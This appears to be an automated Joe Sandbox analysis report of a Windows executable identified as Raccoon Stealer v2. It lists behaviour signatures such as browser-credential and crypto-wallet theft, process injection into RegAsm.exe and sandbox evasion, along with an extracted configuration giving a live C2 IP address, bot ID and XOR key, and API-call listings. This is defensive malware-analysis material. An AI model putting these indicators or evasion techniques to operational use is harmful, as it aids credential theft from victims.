Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
60lAWJYfsL.exe

Overview

General Information

Sample name:60lAWJYfsL.exe
renamed because original name is a hash value
Original sample name:f7f6eb480fe715733e509d0489171c18.exe
Analysis ID:1468462
MD5:f7f6eb480fe715733e509d0489171c18
SHA1:e28a03d8c62eae2687d8d8f6b6ccb73377bc1a48
SHA256:3898534fa62f5a8f169c66900f183e5637e7c4f9be8c46591568ff489bc432d4
Tags:exeRecordBreaker
Infos:

Detection

Raccoon Stealer v2
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Raccoon Stealer v2
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 60lAWJYfsL.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\60lAWJYfsL.exe" MD5: F7F6EB480FE715733E509D0489171C18)
    • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 5232 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Configuration

Threatname: Raccoon

{"C2 url": ["http://95.169.205.186:80/"], "Bot ID": "23b7de51bb42a569733f1e26dbce63ba", "XOR key": "23b7de51bb42a569733f1e26dbce63ba"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2889674185.00000000012B9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RaccoonV2Yara detected Raccoon Stealer v2Joe Security
      00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RaccoonV2_1Yara detected Raccoon Stealer v2Joe Security
        00000000.00000002.1679665794.0000027E3B800000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RaccoonV2_1Yara detected Raccoon Stealer v2Joe Security
          00000000.00000002.1679410416.0000027E39491000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RaccoonV2_1Yara detected Raccoon Stealer v2Joe Security
            Process Memory Space: 60lAWJYfsL.exe PID: 6828JoeSecurity_RaccoonV2_1Yara detected Raccoon Stealer v2Joe Security
              Click to see the 3 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              2.2.RegAsm.exe.400000.0.unpackJoeSecurity_RaccoonV2_1Yara detected Raccoon Stealer v2Joe Security
                2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RaccoonV2_1Yara detected Raccoon Stealer v2Joe Security
                  0.2.60lAWJYfsL.exe.27e394bb140.0.raw.unpackJoeSecurity_RaccoonV2_1Yara detected Raccoon Stealer v2Joe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:07/06/24-04:21:57.867496
                    SID:2036955
                    Source Port:80
                    Destination Port:49730
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:07/06/24-04:21:57.171740
                    SID:2036934
                    Source Port:49730
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: http://95.169.205.186/Avira URL Cloud: Label: malware
                    Source: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416Avira URL Cloud: Label: malware
                    Source: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416oamingAvira URL Cloud: Label: malware
                    Source: http://95.169.205.186:80/Avira URL Cloud: Label: malware
                    Source: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416%Avira URL Cloud: Label: malware
                    Source: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e4166Avira URL Cloud: Label: malware
                    Source: http://95.169.205.186/(Avira URL Cloud: Label: malware
                    Source: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416NAvira URL Cloud: Label: malware
                    Source: http://95.169.205.186/8895a7edf180661435c15d6dcaf4e416PAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: 00000002.00000002.2889570159.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Raccoon {"C2 url": ["http://95.169.205.186:80/"], "Bot ID": "23b7de51bb42a569733f1e26dbce63ba", "XOR key": "23b7de51bb42a569733f1e26dbce63ba"}
                    Multi AV Scanner detection for submitted file
                    Source: 60lAWJYfsL.exeVirustotal: Detection: 8%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402C05 LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,CopyFileW,DeleteFileW,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,CryptUnprotectData,lstrcmpW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,2_2_00402C05
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040318A LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,2_2_0040318A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00402723 LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,2_2_00402723
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004044BB LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,LocalFree,CryptUnprotectData,CryptUnprotectData,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,LocalAlloc,PathCombineW,CopyFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,lstrcpy,LocalAlloc,lstrcmp,LocalAlloc,wsprintfW,lstrlenW,lstrlenW,LocalFree,CryptUnprotectData,wsprintfW,lstrlenW,lstrlenW,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,2_2_004044BB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401639 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree,2_2_00401639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040823C LocalAlloc,CryptStringToBinaryA,lstrlenA,CryptStringToBinaryA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,StrCpyW,LocalFree,StrCpyW,StrCpyW,LocalFree,2_2_0040823C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004015BE CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,StrCpyW,LocalFree,LocalFree,2_2_004015BE
                    Source: 60lAWJYfsL.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr
                    Source: Binary string: C:\Users\Adminus\source\repos\Mahmoud\Mahmoud\bin\Release\net8.0\win-x64\native\Mahmoud.pdbyy: source: 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: softokn3.pdbp source: softokn3.dll.2.dr
                    Source: Binary string: mozglue.pdb@+ source: mozglue.dll.2.dr
                    Source: Binary string: C:\Users\Adminus\source\repos\Mahmoud\Mahmoud\bin\Release\net8.0\win-x64\native\Mahmoud.pdb source: 60lAWJYfsL.exe, 60lAWJYfsL.exe, 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp
                    Source: Binary string: nss3.pdb source: nss3.dll.2.dr
                    Source: Binary string: mozglue.pdb source: mozglue.dll.2.dr
                    Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
                    Source: Binary string: softokn3.pdb source: softokn3.dll.2.dr
                    Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040DC49 SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,RegOpenKeyExA,CreateWaitableTimerA,GetLastError,GetLastError,CancelWaitableTimer,FindFirstFileA,FindClose,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateMutexA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalAlloc,lstrlenA,FindFirstFileA,FindClose,CreateSemaphoreA,RegOpenKeyExA,ReleaseSemaphore,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,GetLastError,CreateFileMappingW,2_2_0040DC49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004070C9 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,2_2_004070C9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040194A FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose,2_2_0040194A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00404B50 SetEnvironmentVariableA,CreateSemaphoreA,GetLastError,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,CreateMutexA,CreateFileMappingW,RegOpenKeyExA,CloseHandle,CreateEventA,SetEvent,ResetEvent,FindFirstFileA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateFileMappingW,FindFirstFileA,FindClose,CreateEventA,SetEvent,ResetEvent,CreateEventA,SetEvent,ResetEvent,LocalAlloc,GetLastError,LocalFree,LocalFree,LocalAlloc,LocalFree,GetLastError,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,SetEnvironmentVariableA,CreateWaitableTimerA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,CreateSemaphoreA,GetLastError,ReleaseSemaphore,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,SetEnvironmentVariableA,CreateWaitableTimerA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,CreateFileMappingW,CloseHandle,OutputDebugStringA,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CreateMutexA,CreateWaitableTimerA,CreateSemaphoreA,CancelWaitableTimer,SetEnvironmentVariableA,CreateFileMappingW,FindCloseChangeNotification,CreateMutexA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CancelWaitableTimer,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,GetLastError,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,FindFirstFileA,FindClose,CreateSemaphoreA,RegOpenKeyExA,ReleaseSemaphore,ReleaseSemaphore,CreateMutexA,GetLastError,ReleaseMutex,OutputDebugStringA,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,ReleaseSemaphore,CreateFileMappingW,FindCloseChangeNotification,CreateWaitableTimerA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,OutputDebugStringA,CreateFileMappingW,CreateFileMappingW,FindCloseChangeNotification,CreateFileMappingW,RegOpenKeyExA,CloseHandle,LocalAlloc,CreateMutexA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateMutexA,ReleaseMutex,LocalAlloc,RegOpenKeyExA,LocalFree,CreateFileMappingW,RegOpenKeyExA,FindCloseChangeNotification,CreateEventA,SetEvent,ResetEvent,CreateMutexA,ReleaseMutex,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,OutputDebugStringA,ReleaseSem2_2_00404B50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409452 LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,PathCombineW,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,ReadFile,lstrlenA,StrStrA,lstrlenA,StrStrA,LocalAlloc,FindFirstFileW,StrStrW,StrStrW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,StrStrW,StrCpyW,LocalAlloc,PathCombineW,PathCombineW,LocalFree,FindNextFileW,FindClose,LocalFree,CloseHandle,DeleteFileW,LocalFree,DeleteFileW,LocalFree,2_2_00409452
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410952 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,2_2_00410952
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040CA58 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalFree,LocalFree,LocalAlloc,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,2_2_0040CA58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409ADC EntryPoint,LocalAlloc,LocalFree,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,CreateWaitableTimerA,SetEnvironmentVariableA,SetEnvironmentVariableA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,CoInitialize,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,OutputDebugStringA,SetEnvironmentVariableA,CancelWaitableTimer,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateWaitableTimerA,ExitProcess,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,FindFirstFileA,FindClose,LocalAlloc,LocalFree,GetLastError,SetEnvironmentVariableA,CreateWaitableTimerA,GetLastError,GetLastError,OutputDebugStringA,CancelWaitableTimer,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,GetLastError,CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateFileMappingW,SetEnvironmentVariableA,FindCloseChangeNotification,SetEnvironmentVariableA,LocalAlloc,LocalFree,CreateWaitableTimerA,CreateWaitableTimerA,OutputDebugStringA,CancelWaitableTimer,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,LocalAlloc,SetEnvironmentVariableA,LocalFree,SetEnvironmentVariableA,CreateWaitableTimerA,CancelWaitableTimer,SetEnvironmentVariableA,CreateFileMappingW,GetLastError,FindCloseChangeNotification,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,OutputDebugStringA,FindFirstFileA,FindClose,CreateSemaphoreA,ReleaseSemaphore,SetEnvironmentVariableA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,CreateFileMappingW,CloseHandle,CreateMutexA,ReleaseMutex,RegOpenKeyExA,GetLastError,CreateFileMappingW,FindCloseChangeNotification,OutputDebugStringA,CreateMutexA,ReleaseMutex,LocalAlloc,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,CreateSemaphoreA,SetEnvironmentVariableA,ReleaseSemaphore,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CreateEventA,SetEvent,ResetEvent,LocalAlloc,OutputDebugStringA,LocalFree,OutputDebugStringA,CreateFileMappingW,OutputDebugStringA,FindCloseChangeNotification,CreateSemaphoreA,SetEnvironmentVariableA,ReleaseSemaphore,GetLastError,FindFirstFileA,FindClose,CreateWaitableTimerA,CreateWa2_2_00409ADC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004105DE LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,GetFileSize,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose,2_2_004105DE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F4F1 CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,GetLastError,CreateEventA,SetEvent,ResetEvent,CreateMutexA,OutputDebugStringA,OutputDebugStringA,ReleaseMutex,SetEnvironmentVariableA,CreateFileMappingW,CreateFileMappingW,CloseHandle,FindCloseChangeNotification,LocalAlloc,LocalFree,FindFirstFileA,LocalAlloc,CreateFileMappingW,OutputDebugStringA,CloseHandle,SetEnvironmentVariableA,SetEnvironmentVariableA,CreateWaitableTimerA,SetEnvironmentVariableA,CancelWaitableTimer,OutputDebugStringA,CreateMutexA,ReleaseMutex,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileA,FindClose,LocalAlloc,RegOpenKeyExA,RegOpenKeyExA,LocalFree,RegOpenKeyExA,CreateWaitableTimerA,RegQueryValueExW,RegQueryValueExW,2_2_0040F4F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040ED79 lstrlenA,SetEnvironmentVariableA,CreateWaitableTimerA,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CreateMutexA,RegOpenKeyExA,OutputDebugStringA,OutputDebugStringA,ReleaseMutex,RegOpenKeyExA,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,LocalAlloc,RegOpenKeyExA,LocalFree,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,LocalAlloc,LocalAlloc,MultiByteToWideChar,CreateFileMappingW,GetLastError,FindCloseChangeNotification,FindFirstFileA,FindClose,CreateWaitableTimerA,CancelWaitableTimer,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,LocalAlloc,SetEnvironmentVariableA,SetEnvironmentVariableA,LocalFree,OutputDebugStringA,SetEnvironmentVariableA,2_2_0040ED79
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E179 CreateEventA,SetEvent,ResetEvent,CreateMutexA,RegOpenKeyExA,ReleaseMutex,GetLastError,RegOpenKeyExA,CreateWaitableTimerA,RegOpenKeyExA,CancelWaitableTimer,FindFirstFileA,FindClose,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,RegOpenKeyExA,LocalAlloc,OutputDebugStringA,LocalFree,SetEnvironmentVariableA,CreateFileMappingW,FindFirstFileW,FindFirstFileW,2_2_0040E179
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040EB7B CreateEventA,SetEvent,ResetEvent,CreateSemaphoreA,ReleaseSemaphore,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,SetEnvironmentVariableA,FindFirstFileA,FindClose,CreateFileMappingW,OutputDebugStringA,CloseHandle,SetEnvironmentVariableA,LocalAlloc,LocalFree,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateSemaphoreA,ReleaseSemaphore,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalFree,2_2_0040EB7B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040F788 LocalAlloc,GetLastError,GetLastError,LocalFree,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,CreateSemaphoreA,ReleaseSemaphore,CreateMutexA,SetEnvironmentVariableA,ReleaseMutex,OutputDebugStringA,CreateWaitableTimerA,CancelWaitableTimer,GetLastError,CreateFileMappingW,RegOpenKeyExA,CloseHandle,SetEnvironmentVariableA,LocalAlloc,FindFirstFileA,FindClose,LocalAlloc,LocalFree,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,SetEnvironmentVariableA,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,GetLastError,LocalAlloc,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,CancelWaitableTimer,CancelWaitableTimer,CreateFileMappingW,GetLastError,CloseHandle,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,CreateSemaphoreA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,RegOpenKeyExA,CreateSemaphoreA,GetLastError,ReleaseSemaphore,RegOpenKeyExA,LocalAlloc,LocalFree,RegOpenKeyExA,GetLastError,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,SetEnvironmentVariableA,StrCpyW,LocalFree,2_2_0040F788
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00408109 OutputDebugStringA,SetEnvironmentVariableA,FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW,2_2_00408109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040E48D OutputDebugStringA,CreateWaitableTimerA,CreateSemaphoreA,SetEnvironmentVariableA,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateSemaphoreA,ReleaseSemaphore,CreateEventA,SetEvent,ResetEvent,LocalAlloc,LocalFree,GetLastError,CreateWaitableTimerA,GetLastError,CancelWaitableTimer,OutputDebugStringA,CreateWaitableTimerA,LocalAlloc,CreateSemaphoreA,ReleaseSemaphore,RegOpenKeyExA,CreateEventA,SetEvent,ResetEvent,CreateWaitableTimerA,SetEnvironmentVariableA,SetEnvironmentVariableA,CancelWaitableTimer,GetLastError,FindFirstFileA,FindClose,SetEnvironmentVariableA,CreateFileMappingW,CloseHandle,GetLastError,CreateWaitableTimerA,CancelWaitableTimer,OutputDebugStringA,OutputDebugStringA,LocalAlloc,SetEnvironmentVariableA,LocalFree,CreateSemaphoreA,OutputDebugStringA,ReleaseSemaphore,OutputDebugStringA,OutputDebugStringA,CreateMutexA,RegOpenKeyExA,ReleaseMutex,SetEnvironmentVariableA,SHGetFolderPathW,CreateEventA,SetEvent,ResetEvent,FindFirstFileA,FindClose,CreateMutexA,ReleaseMutex,RegOpenKeyExA,CreateFileMappingW,RegOpenKeyExA,CloseHandle,R